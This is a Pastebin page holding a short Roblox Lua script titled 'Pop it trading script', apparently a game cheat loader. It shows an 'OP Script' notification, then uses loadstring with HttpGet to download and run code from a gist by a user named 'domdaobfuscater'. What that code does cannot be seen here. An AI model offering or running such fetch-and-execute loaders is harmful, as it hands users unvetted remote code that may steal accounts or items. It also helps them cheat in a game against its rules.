Gixn

Pop it trading script

Feb 1st, 2023 (edited)
16
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.44 KB | None | 0 0
  1. local notifLib = loadstring(game:HttpGet("https://raw.githubusercontent.com/Sw1ndlerScripts/RobloxScripts/main/Notification%20Library/main.lua"))()
  2.  
  3. notifLib:CreateDefaultNotif({
  4. TweenSpeed = 1,
  5. Title = "Loaded!",
  6. Text = "This is an OP Script",
  7. Duration = 5
  8. })
  9.  
  10.  
  11.  
  12. loadstring(game:HttpGet("https://gist.githubusercontent.com/domdaobfuscater/09214a11b8a30bab47ceff281116195f/raw/40356a0ff4542a51283ab5de0a642233a6ceb6f9/gistfile1.txt"))()
Comments
Add Comment
Please, Sign In to add comment